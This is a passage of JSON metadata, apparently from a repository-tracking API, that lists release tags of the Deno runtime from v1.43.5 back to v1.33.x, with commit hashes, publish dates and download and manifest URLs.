v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3"